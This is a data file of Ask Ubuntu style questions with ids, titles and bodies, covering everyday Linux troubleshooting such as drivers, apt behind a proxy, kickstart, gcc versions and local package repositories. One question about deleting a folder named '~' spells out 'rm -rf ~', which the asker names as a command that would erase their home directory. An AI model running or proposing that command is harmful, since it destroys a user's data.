26308	how to configure mail ( mailutils ) to use maildir schema by default ?	when i type mail command , i get a `` no mail for user '' answer , but there 's indeed mail ( it 's in /home/user/maildir/new ) i guess it has something to do with the mailbox being in maildir format , instead of mbox , but i do n't know how to tell mailutils ( specifically the mail command ) which format to use .
26310	where do i add boot parameters to use ks.cfg	i created a kickstart file ks.cfg and then i have put that in the bootable disk* ( ubuntu 10.04 ) * and then added the following line to the isolinux.cfg linux ks=ks.cfg and have not removed any other lines from the isoconfig.cfg file and then while installing the installation is not automated , again it is asking for language and all . if i removed include menu.cfg or any other line from isolinux.cfg i am getting a boot error . what should i do now to automate the installation.where should i add the boot parameters so that installation will start from the ks.cfg . thanks and regards ravi kumar
26318	environment variable vs shell variable , what 's the difference ?	somebody told me that : bash is n't an environment variable , it 's a shell variable what 's the difference ?
26334	gnome-power-manager is necessary to spin down hard disks ?	with modern hard disks is necessary to use gnome-power-manager to spin down the hard disks ? or are they prepared to sleep automatically after certain amount of inactivity time ?
26338	change empathy 's status icons	i installed a new icon theme but i want to use custom empathy 's status icons . i go to usr/share/empathy/hicolor & replace the icons there but it does n't take effect ! any help ?
26346	how to use window snapping for ubuntu ?	i am trying ubuntu and i want to have my windows snap to the left and right like windows 7 when i use the hotkeys window key + arrow . how can i do this ?
26351	suspending my laptop breaks ethernet over firewire , are there commands which can fix it ?	as mentioned in this question i am using a firewire cable to provide a private network between my laptop and my desktop , because it makes using the screen sharing program synergy much nicer than using wifi . however when i leave my office for the day and i suspend my laptop , when i return the next day , the desktop and the laptop can not communicate over firewire anymore . the firewire0 device still has an ip address . but when i try and ping the desktop i get no route to host i 'm using kernel 2.6.35-24-generic # 42-ubuntu smp x86_64 on ubuntu 10.10 . is there some way i can remedy this without a reboot ? like , removing some kernel modules and re-inserting them ? here 's what i have tried so far and the results : root @ token : ~ # dmesg|tail -n 1 [ 592525.204024 ] firewire_core : phy config : card 0 , new root=ffc1 , gap_count=5 root @ token : ~ # modprobe -r firewire_net firewire_ohci firewire_core root @ token : ~ # modprobe -v firewire_ohci insmod /lib/modules/2.6.35-24-generic/kernel/lib/crc-itu-t.ko insmod /lib/modules/2.6.35-24-generic/kernel/drivers/firewire/firewire-core.ko insmod /lib/modules/2.6.35-24-generic/kernel/drivers/firewire/firewire-ohci.ko root @ token : ~ # dmesg|tail [ 592525.204024 ] firewire_core : phy config : card 0 , new root=ffc1 , gap_count=5 [ 592563.410868 ] firewire_ohci : removed fw-ohci device . [ 592579.160086 ] firewire_ohci : added fw-ohci device 0000:02:00.0 , ohci v1.10 , 4 ir + 8 it contexts , quirks 0x2 [ 592579.160137 ] firewire_ohci : isochronous cycle inconsistent [ 592579.660294 ] firewire_core : created device fw0 : guid 0000000000000000 , s400 [ 592579.663805 ] firewire_core : created device fw1 : guid 0017f2fffe89bce6 , s400 [ 592579.663813 ] firewire_core : phy config : card 0 , new root=ffc1 , gap_count=5 [ 592579.700720 ] firewire_core : phy config : card 0 , new root=ffc1 , gap_count=5 [ 592579.700842 ] firewire_core : refreshed device fw0 [ 592579.702603 ] firewire_net : firewire0 : ipv4 over firewire on device 0000000000000000 root @ token : ~ # ping stan.firewire ping stan.firewire ( 192.168.100.1 ) 56 ( 84 ) bytes of data . from token.local ( 192.168.100.3 ) icmp_seq=1 destination host unreachable from token.local ( 192.168.100.3 ) icmp_seq=2 destination host unreachable from token.local ( 192.168.100.3 ) icmp_seq=3 destination host unreachable i also tried removing the modules prior to suspending , and re-inserting after resuming . this did not work either : - ( edit : if i unplug and replug the firewire cable after resuming from suspend , i see the message : firewire_core : bm lock failed , making local node ( ffc0 ) root i do n't see this message when i unplug/replug before suspend ...
26353	how can i sync with an ipod nano 6g ?	i 'm having no luck at all with this ipod nano . i 've tried the following software : banshee - the ipod shows up and files seem to be copied , but they do n't show up on the ipod . rhythmbox - same as banshee . claims to sync but no files available on the ipod gpodder - at first it would n't even recognize the device even though i set the mount point and device type . after syncing one file to the ipod from itunes on my mac it now behaves as banshee and rythmbox . gtkpod - again : copies the files but they are inacessible on the ipod . hipo - does n't even recognize the ipod amarok - what is this , i do n't even ... so to summarize : after some fiddling i can get most of these apps to recognize the ipod and copy files to it , but they are not accessible on the ipod which sort of defeats the whole purpose . help me out here . my continued harmonic love life depends on it . ( yes , it 's the girlfriends ipod and laptop )
26354	i think `` /lib/modules/ $ ( uname -r ) /build '' points to incorrect folder	i compile/create my own deb packages of kernel with : make-kpkg -- rootcmd fakeroot -- initrd -- append-to-version= $ version -- revision=1 kernel_image kernel_headers but when i install both packages , in /lib/modules/ ( *name_kernel_compiled* ) it creates two links , sources and build , pointing to folder with sources , from i 've compiled . sources link is correct but build should point to /usr/src/linux- ( version kernel ) , do n't you think ?
26360	how to add .pac files ?	i have got a proxy auto-configuration script which works on browsers and not on synaptic or cli . any idea where to put the proxy.pac file so that i can use the terminal / synaptic for internet access ?
26362	how to fetch the latest version of mysql using tools like apt ?	this fetches revision 5.1 only : sudo apt-get install mysql-server but the latest community server version is 5.5.9
26367	exporting bash function in .profile or .xprofile kills x during login	i 'm trying to export a bash function during gnome login using one of the login shell start-up scripts . i 've tried doing it in ~/.profile and ~/.xprofile but it results in x dying and restarting at the login screen . i am able to export environment variables from these scripts without problems during gnome login ; only exporting a function ( any function , regardless of content ) kills x. i can also source both scripts from a terminal and the function is exported as expected without any problems . the function also gets exported fine if the scripts are invoked by a bash login shell ( bash -l ) from a terminal . why is exporting a function at gnome login killing x ? / can i do anything to fix it ? ( i realise i could export the function from .bashrc , but using a profile is more convenient in my situation and i 'd like to understand why this crash is happening . )
26372	how to have a path containing spaces in path ?	i tried export task= $ home/ubuntu\ one and export task= '' $ home/ubuntu one '' but neither works .
26377	file manager respawns with ubuntuone	starting feb 11 , my ubuntu 10.10 desktop respawns filemanager many times ( hundreds ) . you can observe the `` starting file manager '' processes at the bottom of the gnome desktop . i can make this behaviour stop by : system - > preferences - > ubuntu one - > services - > uncheck `` files '' . can someone walk me though the debug process ? linux 2.6.35-25-generic # 44-ubuntu smp fri jan 21 17:40:48 utc 2011 i686 gnu/linux i 'm trying to reset the ubuntu one configuration . i found good information here : https : //wiki.ubuntu.com/ubuntuone/bugs look for `` root_mismatch in syncdaemon.log '' after running through the steps to reset and restart ubuntuone , no more `` starting file mangager '' respawns .
26378	how to determine what modules are missing	i got an `` fatal error : could not find /lib/modules/2.6.35-25-generic : file not found '' or something like this when booting . the system appears to be stable , but this message is annoying . how can i see what modules is missing ?
26386	renaming localhost	by default 127.0.0.1 has the localhost alias . i found several approaches to changing it to a different string , but what is the standard , effective and safe best-practice way of doing it ? can i give the same ip , but with a different port , a specific/different alias e.g . when i type marius to get responses from the server listening to http : //127.0.0.1:3000 ?
26389	package manager does n't work anymore	i 'm using ubuntu 10.10 and recently my package manager has stopped working because of some problems with dependencies or something . i ca n't upgrade , install or uninstall anything at all . this is a huge problem . i could n't find a solution to this with google so i 'm asking here for help . this is what apt-get -f install outputs lang=en_us.utf-8 sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done the following package was automatically installed and is no longer required : firefox-4.0-core use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0b of additional disk space will be used . setting up openjdk-6-jre-headless ( 6b20-1.9.5-0ubuntu1 ) ... update-alternatives : error : alternative path /usr/lib/jvm/java-6-openjdk/jre/bin/java does n't exist . dpkg : error processing openjdk-6-jre-headless ( -- configure ) : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing : openjdk-6-jre-headless e : sub-process /usr/bin/dpkg returned an error code ( 1 )
26393	getting processor information	i have just ran lshw to get some information about a machine i know nothing about , and i just wanted to confirm something . does this basically mean it is a dual core 64 bit processor that is installed ? *-logicalcpu:0 description : logical cpu physical id : 0.1 width : 64 bits capabilities : logical *-logicalcpu:1 description : logical cpu physical id : 0.2 width : 64 bits capabilities : logical looking further down i see this *-cpu:1 physical id : 1 bus info : cpu @ 1 version : 6.7.6 serial : 0001-0676-0000-0000-0000-0000 size : 3150mhz capabilities : vmx ht configuration : id=0 *-logicalcpu:0 description : logical cpu physical id : 0.1 capabilities : logical *-logicalcpu:1 description : logical cpu physical id : 0.2 capabilities : logical which makes me almost certain it is dual core but not convinced on the 64 bit . any help for this n00b would be greatly appreciated !
26395	wireless keeps disabling or stays disconnected ( realtek rtl8191sevb )	i have realtek rtl8191sevb wireless card on ubuntu 10.10 : $ lspci -v | grep network 03:00.0 network controller : realtek semiconductor co. , ltd. rtl8191sevb wireless lan controller ( rev 10 ) when i load its driver , according to the network manager it sometimes blinks with a list of available networks but it keeps disabling itself or it stays disconnected . so , i ca n't connect to any wi-fi network ( which results in frustration ) . the driver is loaded : $ lsmod module size used by r8192se_pci 509932 0 looks normal : $ sudo lshw -c network *-network description : wireless interface product : rtl8191sevb wireless lan controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 10 serial : 1c:65:9d:60 : c7:7a width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl819xse driverversion=0019.1207.2010 firmware=63 latency=0 link=no multicast=yes wireless=802.11bgn resources : irq:17 ioport:2000 ( size=256 ) memory : f0500000-f0503fff configured : $ sudo iwconfig wlan0 wlan0 802.11bgn nickname : '' rtl8191seva2 '' mode : managed frequency=2.412 ghz access point : not-associated bit rate:130 mb/s retry : on rts thr : off fragment thr : off encryption key : off power management : off link quality=10/100 signal level=0 dbm noise level=-100 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 is not blocked : $ rfkill list all 0 : tpacpi_bluetooth_sw : bluetooth soft blocked : no hard blocked : yes however something 's happening with it : $ dmesg [ 6485.948668 ] initializeadapter8190 ( ) : ==++== > turn off rf for rfoffreason ( 1073741824 ) -- -- -- -- -- [ 6486.062666 ] rtl8192_setwirelessmode ( ) , wireless_mode:10 , benableht = 1 [ 6486.062671 ] initializeadapter8192se ( ) : set mrc settings on as default ! ! [ 6486.062675 ] hw_var_mrc : turn on 1t1r mrc ! [ 6486.064091 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 6486.248761 ] rtl8192_setwirelessmode ( ) , wireless_mode:10 , benableht = 1 [ 6486.248771 ] initializeadapter8192se ( ) : set mrc settings on as default ! ! [ 6486.248776 ] hw_var_mrc : turn on 1t1r mrc ! [ 6486.580083 ] gpiochangerf - hw radio off [ 6486.610085 ] ============ > sync_scan_hurryup out [ 6486.623814 ] ================ > r8192_wx_set_scan ( ) : hwradio off [ 6486.830484 ] ========= > r8192_wx_set_essid ( ) : hw radio off , or rf state is erfoff , return so , does anyone know where the problem might be ?
26396	ca n't install libopenssl-ruby	i 'm trying to install ruby on rails and i ca n't seem to install libopenssl-ruby . i 'm on a vps and i 've installed jaunty as the newer releases do n't seem to work very nicely . when i do : apt-get install libopenssl-ruby i get : e : package libopenssl-ruby has no installation candidate originally it simply said that it could n't find the package but after wget'ing a deb form here : http : //linuxappfinder.com/package/libopenssl-ruby and trying to install using dpkg i get this new error . dpkg itself said that it could n't install my deb as it depended on 'libopenssl-ruby ' . currently my sources.lst is this : # # # # # # ubuntu main repos deb http : //us.archive.ubuntu.com/ubuntu/ hardy main restricted universe multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ hardy main restricted universe multiverse does anyone know what might be wrong ?
26400	how can i read information set with setpci ?	i 'm using setpci to set the clockspeed of my intel 945gme like so : setpci -s 00:02.0 f0.b=00,60 setpci -s 00:02.0 f0.b=33,05 however i 'm stuck on how to read the information back , i tried : setpci -s 00:02.0 f0.b as the setpci man page says to simply omit the value to read the register , but it returns '03 ' regardless of what i 've set . how can i read the value of the register so that a small script might check the current value ?
26405	what are full partition/disk imaging solutions that produce mountable images ?	i want to make full disk images of different computers that i could later restore if something goes wrong . also , being able to mount the image/access the backed up files would be really useful . what are my options ?
26412	broadcom wireless card disappears after restart	i used 'additional drivers ' to install 'broadcom sta wireless driver ' and it returns an error . within jockey.log it says the following numerous times . 2011-02-14 21:24:06,945 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted after it returns the error the network card will work temporarily until i restart the laptop . when i restart i got to go through the procedure again of trying to activate the driver , returns an error however it works temporarily . the network card is as follows on a dell inspiron 1545 : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] rev 01 i have been trying to solve this myself for many hours . any help is appreciated/
26413	fat32 partition lock	a am asking about problem with usb data stick ( that uses fat32 file system ) . if you unplug usb stick without unmounting ( safly remove ) data may become locked when you mount usb stick another time ( you ca n't make changes to files ) . if you unmount and mount partition few times , data becomes normally accessible . problem is that i can not repeat ( force ) this problem now . but it has happened many times even recently . has this been happening to someone else ?
26415	session management error : none of the authentication protocols specified are supported	the title is the first error that has sent me on a mission to fix things . motivation : i was trying to install the new enthought python distribution -- when the error above first showed up . the install finished -- and looked like there were a few more times it flagged dcopserver problems : please check that `` dcopserver '' program is running ! could not read network connection list : ~/home/user/.dcopserver_host__0 when running ipython from the distribution , it claims that readline ( the ability to up arrow in history or tab-complete ) is not available for my system . it is though -- if i run the ipython that 's sitting in /usr/bin/ipython all readline features work perfectly . so , i tried to fix the install by trying to fix what i thought could be causing the problems . bad things that are happening that i want to be fixed : when restarting i get the error : could not update iceauthority file /home/username/.iceauthority . ipython readline does n't work with enthought 's ipython things i have tried : changed the owner of my ~/.iceauthority to be me . changed the owner of home directory ( and all nested files and folders ) to be me double checked that /var/lib/gdm was owned by gnome ( yep ) attempted to reinstall dcop , kbuildsycoca stuff ( fail ) i 've removed nautilus ; rebooted ; reinstalled ; rebooted ; removed ubuntu-desktop ; rebooted ; reinstalled ; rebooted . any suggestions on how to fix the bad things that are happening would be greatly appreciated ! computer : ubuntu 10.04 x86
26425	keyboard freezes when xorg crashes	situation is like that . many times has happened that xorg freezes and with it also keyboard . quite some times because of some compiz effects or flash ( fullscreen switch ) . keyboard becomes totaly unresponsive , while mouse still works ( i can move cursor , but ca n't click since desktop freezes ) and music still plays and i can connect trough ssh . this is the only way i know i can try to solve problem - either by killing browser & flash or lastly restarting xorg server . this problem appears on more than one ubuntu computer . my home dekstop with proprietery nvidia driver , on my work where i use noveau driever ( opensource driver for geforce ) and sometimes ( but rarely ) also on laptop with ati graphics ( using r300g driver which is really good ! ) . can someone explains why mouse still works while i ca n't input from keyboard ? ( i ca n't switch to virtual console or do r-e-i-s-u-b command ) i have usb keyboard and usb mouse .
26433	how to print over ssh ?	i have the following configuration : p == u -- -- -- -- -- -- -- -- w p is a hp laserjet , connected to u , which is an ubuntu 10.04 desktop machine with a standard gnome setup from the live cd . i just selected the hp laserjet in the gnome printer admin and it works , i can print locally . w is a remote windows machine , server 2003 , and -- - is an untrusted connection . i wonder if i can create an ssh tunnel between u and w , so w can print using u 's printer service . which ports will i need to forward and what kind of printer must i add then on the windows machine ? edit : i found out i can go to http : //localhost:631/ on the u machine and there is the cups browser gui . i will try and forward port 631 to w , and add a printer on w like http : //localhost:631/printers/hp
26439	how do i set fish as the default shell ?	is there a way to set fish as the default shell in ubuntu netbook remix ? i put in my .bashrc to run fish , which works fine , but ubuntu recognizes it as fish running inside bash , which means that when i try to close the shell it warns me that a task is still running . it does n't pop up as a new application , so i ca n't pin it to my bar like a normal app .
26441	can i make new nautilus create tabs , instead of making new windows ?	when i connect my external drive , which has 4 partition , it opens 4 nautilus windows . when i connect a pen-drive , it opens another one for that . is there a way that new windows will create a tab in an open instance of nautilus , and if there is n't any instance open , create a new one , and open further windows in that . thanks .
26448	usb devices are not working on server	i have installed ubuntu server 10.04 and my server does n't detect the external usb devices . mouse , keyboard and usb harddisk .
26449	how to make gui based setup of git server ?	i have 1 git server and few systems ( git installed ) connected to server . i 'm trying to setup a gui based setup for server and clients systems both . i 'm have ubuntu on all systems . could anyone help me in this regard ? any help would be greatly appreciated ... .
26451	grid hotkeys in compiz are not responding	i have tried almost everything i can think of and i could n't find out why ( through google ) my grid hotkeys are n't working . i 'm using the grid plugin for compiz .
26455	can not update- insufficient space- extend folder to external hdd ?	i have my computer on a dual-boot linux/winxp with a partitioned hard drive for each . recently my linux ran out of memory and can not update . i tried sudo apt-get clean and that worked for a while but not any more . i tried using the windows program to change the partitions up but the linux one was locked for some reason . i read something about using a live cd to try and repartition it but i really do n't want to do that . i have an external hdd and wanted to know if i could somehow just extend the folder somehow or something ? thanks !
26461	how do i get a uga itek ituga17d1 displaylink usb adaptor to work ?	i really need to run this product with a linux distro . for first i choose ubuntu but i do not have particular preference ... i need to run a 37 '' monitor in vertical way so with 1080x1920 resolution . can you provide me a working solution ? i tried a lot of forum solution but no one works . i really need your help . thanks in advance !
26462	google-calendar offline ?	how can i have my google-calendars availabe offline on my pc as well ? i have been using dropbox to sync my calendars in ics-format between different pc 's instead of using google calendar . the disadvantage of google-calendar is , that i can only see my appointments when online . now i want to sync my calendars with my android device as well , what does not seem to be possible yet . so i am planning to have an online copy of all my appointments on google-calendar , in order to sync them with my android device . at the same time i want to be able to access my appointments offline ( have an offline copy of each calendar on my pc 's synced via dropbox ) . is there a way to automatically duplicate and sync coogle-calendars with ubuntu to achieve this ? this question is a follow-up , also see my related question , please : http : //askubuntu.com/questions/26431/how-to-sync-calendar-with-android-without-google
26463	initialise a variable with a specific date in a specific format	i want to initialise a variable with yesterday 's date in a specific format . ex -- -if today is 15 feb , then variable should be -- var=feb 14 date -d '' -1day '' + '' % b % d '' is not working . i do n't know whether the syntax is incorrect or why else it is not working . what is the correct way to use it ?
26466	removing folder named ~	this is the output of ls -l ls -l total 53484 drwxr-xr-x 3 root root 4096 2011-02-10 05:59 ~ -rw-r -- r -- 1 root root 54313810 2011-02-13 05:09 jobs.jar -rw-r -- r -- 1 root root 384035 2011-02-15 05:33 jobslog.out i ca n't do rm -rf ~ because that will remove my home directory . what should i do ? its not a problem for me , but just an eye-sore .
26474	unable to install arduino	at the moment , i try to install arduino on my ubuntu 10.04 ( 32 bit ) computer . i downloaded the latest release at http : //arduino.cc/en/main/software , cd'ed to the directory and unziped the package . when i try to run ./arduino , i get following error : exception in thread `` main '' java.lang.exceptionininitializererror at processing.app.base.main ( base.java:112 ) caused by : java.awt.headlessexception at sun.awt.headlesstoolkit.getmenushortcutkeymask ( headlesstoolkit.java:231 ) at processing.core.papplet. < clinit > ( unknown source ) ... 1 more here is my java -version output : java version `` 1.6.0_20 '' openjdk runtime environment ( icedtea6 1.9.5 ) ( 6b20-1.9.5-0ubuntu1~10.04.1 ) openjdk server vm ( build 19.0-b09 , mixed mode ) any suggestions on this ? i try to install arduino without the 'arduino ' package . i tried to install it with apt-get ( sudo apt-get install arduino ) . when i try to start arduino ( using arduino command ) will cause following error : exception in thread `` main '' java.lang.exceptionininitializererror at processing.app.preferences.load ( preferences.java:553 ) at processing.app.preferences.load ( preferences.java:549 ) at processing.app.preferences.init ( preferences.java:142 ) at processing.app.base.main ( base.java:188 ) caused by : java.awt.headlessexception at sun.awt.headlesstoolkit.getmenushortcutkeymask ( headlesstoolkit.java:231 ) at processing.core.papplet. < clinit > ( papplet.java:224 ) ... 4 more update : i saw that i installed several versions of jre ( sun and open ) . so i uninstalled the open jre . now , when calling arduino i get a new error : java.lang.unsatisfiedlinkerror : no rxtxserial in java.library.path thrown while loading gnu.io.rxtxcommdriver exception in thread `` main '' java.lang.unsatisfiedlinkerror : no rxtxserial in java.library.path at java.lang.classloader.loadlibrary ( classloader.java:1734 ) at java.lang.runtime.loadlibrary0 ( runtime.java:823 ) at java.lang.system.loadlibrary ( system.java:1028 ) at gnu.io.commportidentifier. < clinit > ( commportidentifier.java:123 ) at processing.app.editor.populateserialmenu ( editor.java:965 ) at processing.app.editor.buildtoolsmenu ( editor.java:717 ) at processing.app.editor.buildmenubar ( editor.java:502 ) at processing.app.editor. < init > ( editor.java:194 ) at processing.app.base.handleopen ( base.java:698 ) at processing.app.base.handleopen ( base.java:663 ) at processing.app.base.handlenew ( base.java:578 ) at processing.app.base. < init > ( base.java:318 ) at processing.app.base.main ( base.java:207 )
26475	geforce gt240m : how to disable notebook screen and enable external monitor	when i attach my notebook ( nvidia geforce gt 240m ) to my panasonic-tv via hdmi , both screens are activated . i use nvidia-driver version 260.19.06 . i wonder how to deactivate my notebook display automatically or with one script and switch to the external monitor when attached . the tv needs an overscan-correction of 100px to display the whole screen . i also want to close the notebook without deactivating the external monitor , what still happens now . is this possible ?
26483	youtube videos sticking to the screen	i can watch youtube movies just fine , but sometimes they stick to the screen when i close them . when that happens , i ca n't see them . but , when something black comes over that area of the screen , the black changes into the frozen image of the youtube video . for some reason , it 's not on the screenshot . it 's kind of hard to explain what i mean without images , but i hope you 'll understand .
26492	is there an application for reading mobi files ?	is there e-book reader on ubuntu that read mobi file format ?
26498	choose gcc and g++ version	so i have installed gcc-4.4 and gcc-4.3 ( same for g++ ) . now as far as i remember there is a tool in ubuntu which sets the symlinks for you if you just tell it which version you want . however it does not seem to work in the newest version , which i find disappointing . root @ nexus : ~ # update-alternatives -- config gcc update-alternatives : error : no alternatives for gcc . root @ nexus : ~ # update-alternatives -- config cc there is only one alternative in link group cc : /usr/bin/gcc nothing to configure . root @ nexus : ~ # dpkg -l | grep gcc | awk ' { print $ 2 } ' gcc gcc-4.3 gcc-4.3-base gcc-4.3-multilib gcc-4.4 gcc-4.4-base gcc-4.4-multilib gcc-4.5-base gcc-multilib lib32gcc1 libgcc1 any ideas ?
26501	keyboard shortcut to un-focus form controls	while a form control like < select > or < input > is focused the arrow keys , page up , page down , home and end all navigate inside the contents of that control rather than the web page itself . this is very useful , but makes it difficult to navigate web pages by keyboard - after focusing a form control , you 'll have to press tab or shift-tab until you get to a url to be able to navigate with the keyboard again . if there is no url on the web page ( shock , horror ) the mouse seems to be the only way out . so is there a keyboard shortcut to give focus back to the page itself ?
26506	repair gzipped tar	i have a pretty large ( 50gb ) tar.gz file that i ca n't untar anymore . error that i am getting is this : gzip : stdin : not in gzip format tar : child returned status 1 tar : error is not recoverable : exiting now is there any way to repair broken tar.gz ? update : output of file command : $ file projects.tgz projects.tgz : posix tar archive ( gnu )
26507	what 's the significance of `` -0ubuntu1 '' at the end of a package version string ?	many packages built for ubuntu seem to have a `` -0ubuntu1 '' suffix ( or , more generally , -xubuntuy ) . for example , the version string for a bleeeding-edge package from the nova project looks like : 2011.2~bzr663-0ubuntu1 i understand that 2011.2 is a major version , and bzr663 refers to revision 663 in the bzr repository , but what is the meaning associated with 0ubuntu1 ?
26509	windows 7 and ubuntu 10.10 network controller driver conflict ?	has anyone had problems with how windows and linux drivers configure the network card ? i have a realtek 8112l lan controller and am dual-booting windows 7 and ubuntu 10.10 . after using network processes under both systems the network card stops working under either , forcing me to reset the cmos . update the cmos reset works but is not necessary for me . shutting down and unplugging the power cord works as well . i fear the only solution will be for someone to fix the driver , if anyone has another idea i would love to hear it .
26510	some gui issues with netbook edition	i do n't like the netbook interface released with 10.10 , so i want to use the old interface ( released with ubuntu netbook edition 10.04 ) . here how it looks at the moment : the problem is , that this box is bigger then the others ... i 've tried to change the font ( system - > preferences - > appearance - > fonts ) , but does n't work . the icons are pretty big , i have no idea , where i can set the icon size . maybe the same as the first problem - the font size is to big and i see only part from the name of the program . setting other font size via appearance- > fonts does n't help . can someone give me a hint , what must be changed , to fix this problems ?
26511	x does n't find nvidia module when installing developer driver	i just downloaded the developer driver from nvidia 's cuda zone . executed it and typed in restart gdm and the it worked . however after rebooting x did n't come up ( xorg log ) , to fix it i can simply rerun the installer and the restart gdm again . what i do n't understand is where it breaks and why x11 does n't find the module ? ! i removed all ( i think.. ) of the nvidia packages which can with ubuntu 10.10 . i 've also googled a bit and found some howtos about manually installing the nvidia driver . however all of them were for an earlier version of ubuntu . please do not respond telling me i should use the proprietary nvidia driver supplied by ubuntu , because i need the development drivers .
26512	sharing swap space between windows and ubuntu	this linux swap space mini-howto describes how to share swap space between windows and linux . **do these instructions still apply to ubuntu in 2011 ? how should i modify the steps for ubuntu ? is there a better approach to sharing swap space ? ** based on the howto , it seems best to create a dedicated ntfs swap partition : dedicated so the swap file will be contiguous and remain unfragmented . ntfs so both windows and ubuntu can read/write to it . ( or is fat32 better for this purpose ? ) then , configure ubuntu to prepare the swap space for use by linux on start up ; by windows on shut down . i want to dual boot ubuntu and windows 7 on my x301 laptop . however , my laptop only has a 64 gb sdd , so i would like to conserve as much disk space as possible . update : there is an alternate method using a special driver for windows that let you use a linux swap partition for temporary storage like a ram-disk , but it does n't seem to be as good ...
26519	should i get rid of the filesystem at /var/lib/ureadahead/debugfs ?	i just installed ubuntu 10.10 . when i run df -h , i get : filesystem size used avail use % mounted on /dev/sda1 285g 20g 251g 8 % / none 1.5g 264k 1.5g 1 % /dev none 1.5g 176k 1.5g 1 % /dev/shm none 1.5g 96k 1.5g 1 % /var/run none 1.5g 0 1.5g 0 % /var/lock none 285g 20g 251g 8 % /var/lib/ureadahead/debugfs is it a good idea to try to get rid off the last item debugfs ?
26521	can you put a window on a list of virtual desktops , rather than just one or all of them ?	i 'd like to have certain windows on a list of virtual desktops , not just on one desktop , or all desktops . for example , if i have these desktops : 1 2 3 4 i 'd like to put a window on desktop 1 and 4 at the same time . can this be done with gnome and/or compiz ? if not , what are the list of options to make this possible ?
26523	fonts are too wide	two days ago some fonts on my system become too widespaced , like this : see how big and widespaced the fonts on clementine playlist are and how good they look on the appmenu ( where my mouse pointer is ) . this is not because clementine is qt4 , i 've got the same problem with chrome , opera etc ... i 've been messing with system-settings ( kde settings tool ) a day before the fonts become that widespaced in order to make my kde apps look more native on my gnome , but i have n't touched the fonts settings there . any ideas , solutions ?
26524	having two windows next to each other on gnome , similar to the win-left/right shortcut on win7 ?	i would like to have two windows next to each other . for those of you who used windows 7 you probably know that there is a shortcut ( win-left/right ) to move one window to the left or right half of the screen . i 'm looking for a similar feature in gnome .
26525	where is xserver log file located ?	my ubuntu 10.10 sometimes totally freezes . i suppose that it is somehow related to my graphic card and would like to check xserver log . where is this file located ?
26528	error 503 : service unavailable when using apt-get update behind proxy	i am using a transparent proxy ( other box ) . when i try to do an 'apt-get update ' i get these warnings ( in german ) : ... w : fehlschlag beim holen von http : //security.ubuntu.com/ubuntu/dists/maverick-security/restricted/source/sources.gz 503 service unavailable w : fehlschlag beim holen von http : //security.ubuntu.com/ubuntu/dists/maverick-security/universe/source/sources.gz 503 service unavailable w : fehlschlag beim holen von http : //security.ubuntu.com/ubuntu/dists/maverick-security/multiverse/source/sources.gz 503 service unavailable w : fehlschlag beim holen von http : //security.ubuntu.com/ubuntu/dists/maverick-security/main/binary-i386/packages.gz 503 service unavailable w : fehlschlag beim holen von http : //security.ubuntu.com/ubuntu/dists/maverick-security/restricted/binary-i386/packages.gz 503 service unavailable w : fehlschlag beim holen von http : //security.ubuntu.com/ubuntu/dists/maverick-security/universe/binary-i386/packages.gz 503 service unavailable e : einige indexdateien konnten nicht heruntergeladen werden , sie wurden ignoriert oder alte an ihrer stelle benutzt . i changed ~.bashrc : http_proxy=http : //192.168.120.199:8080 https_proxy=https : //192.168.120:8080 export http_proxy export https_proxy i wrote on commandline : export http_proxy=http : //proxyusername : proxypassword @ proxyaddress : proxyport sudo apt-get update and i edited /etc/apt/apt.conf : acquire : :http : :proxy `` http : //192.168.120.199:8080/ '' ; acquire : :ftp : :proxy `` http : //192.168.120.199:8080/ '' ; nothing has worked . does anyone knows how to make apt-get working through a transparent proxy ? regards , ubuntu2man
26529	how do i set different wallpapers for different virtual desktops ?	the gnome & compiz feature of having many virtual desktops is appreciable , but i would have liked to make them more particular one from another . so i would have liked to have different wallpapers , that is to say background images , on each desktop . could you tell me how to do it ? please note that this is not a duplicate of can i set different background images for different monitors ? .
26531	how do i make ubuntu aware of plugging in and out a second monitor ?	usually , when i plug in a second monitor and i want my computer to be aware of it , i have to go to 'system ' - > 'preferences ' - > 'monitors ' . then , without clicking anywhere , my desktop knows it has to adapt itself ( by cloning the screen or broadening the virtual desktop ) . how can i make this happen automatically ? for more information , my computer is an acer extensa 5636 notebook plugged to a compaq cq1859s monitor , using a vga cable .
26533	installing microsoft vx1000 webcam	i found a tutorial with people saying it works ; here are the instructions i followed . i opened a shell as root on my system and launched the following : wget http : //linuxtv.org/hg/v4l-dvb/archive/tip.tar.gz tar zxvf tip.tar.gz cd v4l ... ( whatever the newly created directory name is ) make all sudo make install then i edited /etc/modprobe.d/blacklist-custom and added blacklist sn9c102 . after reboot , i launched sudo gstreamer-properties . however when i type tar zxvf tip.tar.gz it displays : tar : you may not specify more than one `-acdtrux ' or ` -- test-label ' option try `tar -- help ' or `tar -- usage ' for more information . why ? how can i do this ? thanks in advance .
26534	apt-get does n't see packages in my trivial repository	i 've tried to set up a trivial repository with binary .debs for internal use , but apt-get does n't see the packages . i 've done the following : on the web server : created the binary debs with dpkg-buildpackage put all of the binary debs in a web-accessible directory which corresponds to http : //www.example.com/packages generated a packages.gz file in the same directory by doing : dpkg-scansources . /dev/null | gzip -9c > packages.gz on the client machine : added the following line to my /etc/apt/sources.list file : deb http : //www.example.com/packages / ran : sudo apt-get update the output related to my trivial repository looked like this : ign http : //www.example.com release.gpg ign http : //www.example.com/packages/ translation-en_us ign http : //www.example.com release ign http : //www.example.com packages ign http : //www.example.com packages hit http : //www.example.com packages but i ca n't install the package by name . for example , there 's a package called `` python-nova '' which corresponds to package python-nova_2011.3-custom~bzr680-0ubuntu1_all.deb i 've tried to do : apt-get install python-nova , but i get the following error : $ sudo apt-get install python-nova reading package lists ... done building dependency tree reading state information ... done e : could n't find package python-nova
